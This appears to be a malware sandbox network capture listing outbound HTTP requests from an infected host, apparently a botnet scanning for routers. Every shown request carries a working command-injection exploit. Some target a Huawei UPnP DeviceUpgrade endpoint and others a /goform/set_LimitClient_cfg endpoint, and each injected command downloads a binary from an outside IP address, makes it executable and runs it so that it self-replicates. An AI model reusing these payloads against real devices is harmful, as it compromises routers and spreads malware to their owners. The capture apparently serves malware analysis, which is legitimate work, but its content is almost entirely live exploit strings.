                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1885192.168.2.235263041.220.7.10637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.610348940 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1886192.168.2.2358594157.42.170.15937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.610878944 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1887192.168.2.235558641.186.161.3237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.611036062 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1888192.168.2.2353470115.59.172.5637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.611063957 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1889192.168.2.2358330197.148.71.5937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.611068964 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1890192.168.2.2339992197.112.125.12437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.611107111 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1891192.168.2.2356918180.188.214.2268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.411557913 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1892192.168.2.2352172167.21.165.08080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.411602020 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1893192.168.2.2348370212.0.147.1288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.411633968 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1894192.168.2.234166448.97.215.608080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.431473017 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1895192.168.2.2348488119.176.25.48080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.431526899 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1896192.168.2.2349390196.177.148.1638080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.431554079 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1897192.168.2.234027013.159.226.1188080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.431592941 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1898192.168.2.2357504213.123.172.1638080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.432507992 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
